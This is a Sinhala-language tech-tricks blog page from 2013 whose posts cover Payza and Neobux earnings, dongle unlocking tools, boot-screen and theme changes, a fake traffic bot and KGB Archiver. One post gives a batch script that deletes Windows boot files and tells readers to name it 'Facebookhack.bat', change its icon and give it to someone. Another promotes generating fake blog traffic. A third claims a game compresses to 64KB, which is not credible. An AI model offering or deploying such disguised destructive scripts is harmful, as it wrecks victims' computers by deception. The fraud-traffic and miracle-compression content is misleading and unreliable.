Friday, August 30, 2013

Payza ගිණුමක් සැදීම.

| |
0 comments

අද මම කියන්න යන්නේ නොමිලේ අන්තර්ජාලයේ බැංකු ගිණුමක් සකස් කරගන්නා ආකාරයයි.ඔයාලගේ තැන් තැන් වල තියෙන සල්ලි ටික මේකට ගන්න පුළුවන්. Payza ගිණුමක් තුලින් ඔබට මෙම මුදල් ලංකාවට ගෙන්වා ගන්න පුළුවන්.ඉතින් එහෙනම් බලමුකෝ කොහොමද Payza ගිණුම සාදන්නේ කියලා.

1.ඔය යට තියෙන Banner එක උඩ click කරලා Payza Site එකට ඇතුළුවන්න.


2.ඊළගට මෙන්න මෙතනින් Personal කියන එක දෙන්න.ඔයාලා Business වලට එහෙම මේ Accout එක Use කරනවානම් Business කියන එක දෙන්න.සාමාන්‍ය අයට Personal කියන එක හොදයි.මාත් පාවිච්චි කරන්නේ Personal එකක්.

3.ඊට පස්සේ ඔය විස්තර ටික පුරවලා Next Step කියන එක දෙන්න.Postal Code එක දන්නේ නැත්තම් මෙතනින් ගිහිල්ලා හොයාගන්න.

4.ඊළඟට එන විස්තර ටිකත් පුරවන්න.ඔය Transaction Pin එක ට ඔයාලගේ මතක හිටින Number 4,5 ක් විතර දාන්න.මේ Pin එක Account එකෙන් පිටතට මුදල්  මුදල් ගද්දි ඕන වෙනවා.

5.ඊට පස්සේ ඔයාලගේ Email එකට ගිහිල්ලා එක Confirm කරන්න.

6.දැන් ඔයාලගේ Accout එකට Log වෙන්න .

දැන් Accout එක හදලා ඉවරයි.ඉතින් ඔයාලා මේ Accout එකට දැම්මා Email එක හරහා වෙන වෙන තැන් වල තියෙන මුදල් ටික එක තැනකට ගන්න.අපේ Facebook Fan Page එක හරහා අපිත් එක්ක සම්බන්දවෙන්න ඔයාලට පුළුවන්.
කුමක් හෝ ප්‍රශ්නයක් ඇති උනොත් Comment කරන්න.

ඕනෙම Dongle එකක් ඉක්මනින් Unlock කරමු

| |
0 comments

මම අද කියලා දෙන්න යන්නේ ඕනෙම Dongle එකක් ඉක්මනින් Unlock කරන හැටි... මේකෙන් අපිට පුලුවන් ඕනෙම Dongle එකක් ඕනෙම සිම් එකකට අන්ලොක් කරන්න....
මම පහල කියලා තියෙන විදියට වැඩේ කරගෙන යන්න...

ආ කියන්න බැරි උ‍නා ඕක්කෝටම කලින් මෙන්න මේ File ‍දෙක Download කරගෙන ඉන්න.. Unlock කරද්දි මේ දෙක වැදගත් වෙනවා...


ඔයා කැමති සිම් එකකට පමණක් Unlock කරන හැටි

  • මුලින්ම Dongle එක Plug කරලා මම දුන්න Folder එකේ තියෙන Universal MasterCode කියන Soft එක Open කරගන්න.
ඊට පස්සේ

01 ඔයා‍ගේ Dongle එකේ වර්ගේ තෝරන්න
02.Dongle එකේ IMEI එක ඇතුලත් කරන්න.(අංක 15)
03.Auto Select (මේක වෙනස් කරන්න එපා)
04.Calculate කරන්න




මෙතන තියෙන Unlock Code එක Save   කරලා තියාගන්න.
දැන් අන්තිම කොටස.

  • Lock කරලා තියෙන Sim එකක් දාන්න.(උදාහරණයක් විධියට ඔයාගේ Mobitel නම් නිසා Dialog,Hutch,Etisalat,airtel වගේ එකක් දාන්න.ඒ දාන Sim එක විතරයි මේ ක්‍රමේදි Unlock වෙන්නේ)
  • දැන් Dongle එක ආයෙත් ගලවලා ආයෙත් Plug කරන්න.
  • දැන් Code එකක් අහයි.එතනට අපි අර මුලදි ගත්ත Unlock Code එක දෙන්න.
  • දැන් Dongle එක Unlock වෙලා තියෙන්නේ ඔයා අර පස්සේ 

හැම Sim එකක්ටම unlock කරන හැටි

  • මුලින්ම මම දුන්න Folder එකේ තියෙන HUAWEI MODEM Code Writer Software එක OPEN කරලා Run Command එක දෙන්න.
  • දැන් “Please Select Com Port” Select කරන්න













  • ඊට පස්සේ එන එකෙන් මුලින්ම Detect Click කරන්න.Dongle එක detect වුනේ නැත්නම් Dongle එක ගලවලා ආයෙත් plug කරන්න.
  • දැන් Detect Click කරලා Dongle එක ගහලා තියෙන Port එක Select කරන්න.ඊට පස්සේ ඒක Accept කරන්න
  • අන්තිමට UNLOCK DONGLE CLICK කරලා ටික වේලාවක් ඉන්න.Dongle එක Unlock වේවි.දැන් Dongle එක ගලවලා ආයෙත් Plug කරලා බලන්න.....
ඒක දැන් UNLOCK………………වෙලා ඇති... මොනවාහරි උදව්වක් ඕනේනම් කියන්න... තව ක්‍රම ගොඩක් තියෙනවා.. ඒවත් හිමිහිට දාන්නම්


යන්න කලියෙන් මේ ගැන Comment එකක් දාගෙනම යන්න. අපිට ඔයාලගෙ Comments බොහොම වටිනවා. 

ඒ වගේම අපි 
www.geek.lk එකේ WebGeek තරගයට ඉදිරිපත් වෙලා තියෙනවා... පුලුවන්නම් ඒකටත් Vote කරගෙන යන්න.. ඔයාලට ඒකට පහල තියෙන Banner එක භාවිතා කරන්නත් පුලුවන්..







Thursday, August 29, 2013

Neobux කුප්පිය #01

| |
0 comments
අද නම් කියන්න යන්නේ ගොඩක් ලොකු කතාවක්.මේක මුල ඉඳලම හොදට කියවන්න. මම මේ කියන්න යන්නේ E money ගැන. සමහරු නම් මේ ගැන දන්නවා ඇති එත් තවත් සමහරක් මේ ගැන අහලවත් නැතුව ඇති. ඉතින් එක හින්දා අපි ඔය දෙගොල්ලන්ටම හරියන විදිහට Neobux කියලා දෙන්නම්.ඉතින් ඇත්තන්ම කියනවනම් Internet එකෙන් සල්ලි හොයන්න ගොඩක් ක්‍රම තියෙනවා.
  • PTC(Paid To Click)
  • Mini Jobs
  • Selling

ඉතින් මෙන්න මේ වගේ ගොඩක් ක්‍රම තියෙනවා.අද මම මුලින්ම කියන්නේ PTC Site එකක් ගැන.හැබැයි ඔය PTC Site වලින් 99.1% තියෙන්නේ බොරු සල්ලි ගෙවන්නේ නැති ඒවා.ඔය ඔයාලට Ad එකකට $2,$5,$7,$10 වගේ ගෙවන Site තියෙන්නේ මේ සේරම බොරු සල්ලි ගෙවන්නේ නැති (Scam) ඒවා.සාමාන්‍යයෙන් හොද සල්ලි ගෙවන Site එකක් Ad එකකට ගෙවන්නේ $0.02 වගේ ගානක් තමා.හැබැයි එහෙම කියලා හැම $0.02 ගෙවන එකක්ම ඇත්ත නෙමේ.මම කියලා දෙන Site සේරම ඇත්ත ඒවා සල්ලි අරන් තියෙනවා.හ්ම්ම් කතා ඇති දැන් එහෙනම් වැඩේට බහිමුකො.

1.මුලින්ම ඔය පහලින් Click කරලා Neobux එකට යන්නකෝ.

2.ඊට පස්සේ ඔය උඩ තියෙන Register එක Click කරන්න.


3.ඊට පස්සේ මේවා ටික ඔයාගේ විස්තර දාල පුරවලා Continue කියන එක දෙන්න.ඔය Payza/Paypal Email කියන එකට ඔයාගේ Bank Account එකට දාපු Email එක දාන්න.Bank Accout එකක් හදන හැටි දැනගන්න මෙතන Click කරන්න.

3.ඊට පස්සේ ඔයාලගේ Email එකට Neobux එකෙන් Massage එකක් ඇයි එකේ තියෙන Link එකෙන්       Accout එකට Log වෙන්න.Log වෙද්දී Secondary Password කියන එකට මොනවත් දන්නේ නැතුව Log 
වෙන්න.

4.ඊට පස්සේ ඔය View Advertisment කියන එක දෙන්න.


5.ඊට පස්සේ මේ වගේ Page එකක් එයි.මේ තියෙන්නේ ඔයාලගේ Ads තමා.ඉතින් ඔය Ad එකක් උඩ Click කරාම මද රතු පාට බෝලයක් පෙනෙයි. ඒ බෝලෙ උඩ Click කරන්න.


6.දැන් ඔයාලට අලුත් Tab එකක් Open වෙලා Page එකක් එයි.එක මෙන්න මේ වගේ ඇති එකේ තත්පර 20ක්  වගේ පොඩි කාලයක් යද්දී මෙහෙම වැටෙයි .ඊට පස්සේ ඒ Page එක Close කරලා අනිත් Ads ටිකත් ඔහොම බලන්න .
 Advertisement validated! $0.001 + 1 Bonus Pack were credited in your account.

7.දැන් Ad එකක් බලලා ඉවරයි.දැන් ඔයාගේ ගිණුමට සල්ලි ඇවිල්ල ඇති.දැන් ඔහොම සේරම Ad ටික බලන්න තියෙන්නේ


 සාමාන්‍යයෙන් අලුතෙන් හදපු ගිණුමකට දවසකට Ads 8-12 වගේ ප්‍රමාණයක් ලැබෙයි.ටිකක් කල් යද්දී එක  වැඩි වෙයි.අනික තමා අපි ට Ads ලැබෙන්නේ දවසකට වරක්.

මෙන්න මේ කාරණා ගැන සැලකිලිමත් වන්න 
  • Ads බලන විට එක වරකට එක Ad එකක් පමණක් නරබන්න.
  • දිනපතා Ads බලන්න.
  • මෙම වෙබ් අඩවියේ එක Computer එකිකින් එක ගිණුමක් පමණක් සාදන්න.
ඉතින් මේ Neobux එකෙන් මුදල් උපයන්න තවත් ක්‍රම තියෙනවා.ඒවා ඉදිරි Post වලදී කියන්න බලාපොරොත්තු වෙනවා.මොකක් හෝ ප්‍රශ්නයක් අවොත් Comment කරන්න.නැත්තම් අපේ Facebook Fan Page එකට Massage එකක් දන්නා.Fan Page එකට Like කරන්නත් අමතක කරන්න එපා.....


Wednesday, August 28, 2013

මුහුණ පෙන්වා පරිගණකයට ඇතුලු වෙමුද..

| |
0 comments
මෙන්න මම තවත් අලුත් වැඩක් අරගෙන ආවා.... මේකෙන් අපිට පුලුවන් අපේ මුහුණ පෙන්වලා පරිගණකයට ඇතුලු වෙන්න..... මේකේ නම තමයි Luxand Blink.මේක ක්‍රියා කරවන්න අපිට webcam එකක් උවමනා කරනවා.... හදිසියේ හරි අපිට මුහුණ පෙන්වලා ඇතුලු වෙන්න බැරි උනොත් අපිට ඒ වෙනුවට අපේ Password එක භාවිත කරන්න පුලුවන්.



බය වෙන්න දෙයක් නෑ මේක නියමෙටම වැඩ....... එහෙනම් ඒක මෙතනින් බාගන්නකෝ.....
යන්න කලියෙන් මේ ගැන Comment එකක් දාගෙනම යන්න. අපිට ඔයාලගෙ Comments බොහොම වටිනවා. ඒ වගේම අපේ Facebook Fan Page එකට එකතු වෙලාම යන්න.


තවත් මේ වාගේ සුපිරි Trick එකකින් හමුවෙමු.............




Monday, August 26, 2013

System එක සදහටම දොයි කරමු

| |
0 comments
මේකනම් ටිකක් භයානක Virus එකක් කියලා හිතා ගත්තට කමක් නෑ... මේකෙන් වෙන්නේ ඔයාලාගේ Computer or Laptop එකේ Boot වෙන්න ඕක කරන ඔක්කොම File මකලා දාන එක... ඒ කියන්නේ Restart වෙවී තියෙයි.සුපිරි නේ....
බැරිවෙලාවත් මේක Open කරලා වෙන දේවල්වලට මමනම් වගකියන්නේ නෑ..... 


හා.. හා.... දැන් මේ පහල තියෙන Code ටික Notepad එකේ කොටා ගන්නකෝ....
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

දැන් මේක .bat කියලා Save කරගන්න...
Facebookhack.bat  etc.....

මේකේ Icon එක එහෙම වෙනස් කරලා කැමති කෙනෙක්ට දෙන්න... :D

Try This At Your Own Risk

For Educational Purposes Only

යන්න කලියෙන් මේ ගැන Comment එකක් දාගෙනම යන්න. අපිට ඔයාලගෙ Comments බොහොම වටිනවා. ඒ වගේම අපේ Facebook Fan Page එකට එකතු වෙලාම යන්න.

තවත් මේ වාගේ සුපිරි Trick එකකින් හමුවෙමු.............


Windows 7 Boot Screen එක අපිට ඕන විදියට වෙනස් කරමු

| |
0 comments
මම දැන් කියලා දෙන්න යන්නේ කව්රුත් කැමති දෙයක්... මේකෙන් අපිට පුලුවන් Windows 7 වල Boot Screen එක වෙනස් කරගන්න.. ඔව් ඕනෙනම් Windows 8 Boot Screen එක උනත් දාගන්න පුලුවන්.. නියමයි නේ.... ඒ වගේම ඒකෙදි වැටෙන Text එක Background එක Animation එක වගේ හැම දෙයක්ම වෙනස් කරගන්න පුලුවන්..


 

සාමාන්‍යයෙන් Windows 7 Boot වෙද්දි එන්නේ පහල තියෙන Boot Screen එකනේ.... අපිට පුලුවන් ඒකේ තියෙන Starting Windows,©Microsoft Cooperation Text උනත් වෙනස් කරන්න.


හා දැන් ඒක මෙතනින් බා ගන්නකෝ.....මේකෙ මම ඔයාලට අවශ්‍ය කරන Boot Screens ටිකකුත් දාලා තියෙනවා..
Password එක : pctrickslanka

දැන් ඕක Open කරගන්න. පහල තියෙනවා වගේ එකක ඔයාලාට දැකගන්න ලැබෙයි.


මේකේ වැඩ කරන විධිය පුරුලු වෙන එකනම් ඒතරම් ගේමක් නෙවෙයි.මොකද මේක හරිම ලේසියෙන් වැඩ කරගන්න පුලුවන් Software එකක්.

මේකත් එක්ක මම ඔයාලාට Animations 6ක් දීලා ති‍යෙනවා... Windows 8 ඒවත් තියෙනවා. 
මුලින්ම File > Load Boot Skin ගිහින් Boot Skins By PC Tricks Lanka කියන Folder එකේ තියෙන Boot Skin වලින් කැමති එකක් තොරාගෙන Open කරගන්න... දැන් ඔයාට පුලුවන් ඒකේ Background එක Text එහෙම වම් පැත්තේ තියෙන තැන්වලින් වෙනස් කරන්න. තව අලුත් Animation ඕනේනම් deviantart එකේ Search කරලා අරගන්න පුලුවන් නොමිලේ.. ඒකට මෙතනින් යන්න. 

දැන් මේක ටිකක් කොහොමද වෙන්නේ කියලා බලාගන්න ඕනේ‍නම් Play Button එක Click කරලා Full Screen ගන්න.Esc වලින් Full Screen අයින් වෙන්න පුලුවන්.ඔක්කෝම කරලා ඉවර වෙලා Apply Button එක Click කරන්න.


දැන් Restart කරලා බලන්නකෝ හැඩ. 

යන්න කලියෙන් මේ ගැන Comment එකක් දාගෙනම යන්න. අපිට ඔයාලගෙ Comments බොහොම වටිනවා. ඒ වගේම අපේ Facebook Fan Page එකට එකතු වෙලාම යන්න.

තවත් මේ වාගේ සුපිරි Trick එකකින් හමුවෙමු.............


Windows 7 එක විනාඩියෙන් Windows 8 කරමුද?

| |
0 comments


මම අද ඔයාලට කියන්න යන්නේ Windows 7 එක Windows 8 කරගන්නේ කොහොමද කියලා.හැබැයි මේකෙන් ඔයාලගේ Windows 7 එක එහෙම්ම තියෙනවා.Window 7 එකේ GUI ( Graphical User Interface) එක වෙනස් වෙනවා. ගොඩක් අයට තියෙන ප්‍රශ්නෙනේ Windows 8 ගැහුවොත් Computer එක Slow වෙයිද කියලා .ඉතින් ඒ අයට මේක ගොඩක් ප්‍රයෝජනවත් වෙයි. ඒ කියන්නේ ඉතින් මේක Theme එකක්. මේක Setup එකක් තියෙන්නේ ඔයාලට තියෙන්නේ Install කරන එක විතරයි.ඊට පස්සේ ඉතින් කවුරුහරි Computer එක On කරලා බලද්දී හිතන්නේ ඔයාගේ තියෙන්නේ Windows 8 කියලා. හැබැයි තියෙන්නේ Windows 7. මේක  30MB විතර File එකක්. ඔයාලත් පාවිච්චි කරලා බලන්නකෝ.යන ගමන් Facebook Page ඒකටත් Like එකක් දාලා යන්න. 

  • මේ තියෙන්නේ මගේ Computer එක. එකේ තියෙන්නේ Windows 7.හැබැයි බලන්නකෝ කොහොමද පෙන්නේ කියලා??? එල නේද?? ඔයාලත් කොහොමද කියලා Comment කරන්න..

මෙන්න Link එක Download කරගන්නකො...
Rar Password එක - pctricks

Sunday, August 25, 2013

Free Unlimited Traffic Generator

| |
0 comments
දැන් මම කියන්නේ Unlimited Traffic Bot එකක් ගැන. මේක ගොඩක්ම වටින්නේ තමන්ගේ Blog එකට Site එකට Traffic නෑ කියලා අඩන අයට තමා... මේකෙන් වෙන්නේ Blog එකේ page Views වැඩි වෙන එක. ඒ කියන්නේ බොරුවට සෙනගන් එනවා වගේ පෙන්වන එකයි.....


දැන් මේක Download කරගෙන ඉන්නකෝ...
Password එක pctrickslanka


දැන් Password  එක ගහලා Bot එක Extract කරගන්න.ඊට පස්සේ එතන තියෙන hits.txt එක Open කරගන්න.


දැන් ඒකේ තියෙන Link එක වෙනුවට ඔයාල Traffic ගන්න බලාපොරොත්තු වෙන Blog එකේ Link එක දාලා Save කරන්න.

දැන් FakeTrafficGenerator By PC Tricks Lanka.exe Bot එක Open කරගන්න


දැන් ඒකේ පහල තියෙන විධියට Hit Em' කියන තැන Click කරන්න.දැන් ඔයාගේ Blog එකට Fake Traffic Generate වෙනවා...


ටිකකින් ඒක Close කරලා බලන්නකෝ... කොච්චර traffic ඇවිද්ද කියලා..... 

යන්න කලියෙන් මේ ගැන Comment එකක් දාගෙනම යන්න. අපිට ඔයාලගෙ Comments බොහොම වටිනවා. ඒ වගේම අපේ Facebook Fan Page එකට එකතු වෙලාම යන්න.

තවත් මේ වාගේ සුපිරි Trick එකකින් හමුවෙමු.............

Saturday, August 24, 2013

4.5 GB Files 64Kb වලට Compress කරපු KGB Archiver

| |
0 comments
අද මම කියන්න යන්නේ ගොඩක් වැදගත් දෙයක්.KGB Archiver කියන්නේ Winrar වගේ Files Compress කරන Tool එකක්.හැබැයි Winrar වලට වැඩිය 100 ගුණයක් හොදයි. මම එහෙම කියන්නේ මේක සම්පුර්ණයෙන්ම Free හින්දා.ඒ වගේම File Compress කරනවා හිත ගන්නවත් බැරි ගානට.හැබැයි Winrar වලට වඩා මේක ටිකක් වෙනස්.ඔයාලට කිව්වට විශ්වාස නැත්තම් මෙන්න තියෙනවා.GTA Sanandreas Game එකම්  64KB වලට ඔයාලට කරන්න තියෙන්නේ මේ File එක Download කරගෙන KGB Archiver එකෙන් Open කරන්න.ඔය පල්ලහින් ඕනනම් Download කරගෙනම බලන්නකෝ.එහෙනම් ඉතින් ඔයාලත් මේක පාවිච්චි කරලා බලන්නකෝ.හොදයි කියලා හිතෙනවනම් Comment එකකුත් දාලා අපේ Facebook Fan Page ඒකටත් Like එකක් දාලා යන්න.........

KGB Archiver එක මෙතනින් Download කරගන්න .
Rar File Password එක - pctricks   
GTA Sanandreas එක මෙතනින් Download කරගන්න.
     Rar File Password එක - pctricks                    
        

                                                                                                        
  • ඔයාලට KGB Archiver එක Install කරද්දී Error එකක් අවොත් මෙහෙම කරන්න.
Step 1 (උඩ Right Click කරලා Troubleshoot Compatibility දෙන්න )
Step 2

  • KGB Archiver එකෙන් File Open කරන්නේ හා Extract කරන්නේ කොහොමද??  
Step 1

Step 2

Step 3


Step 4


හොදයි නම් Comment එකකුත් දාලා Facebook Page ඒකටත් Like එකක් දාන්න අමතක කරන්න එපා....









Powered by Blogger.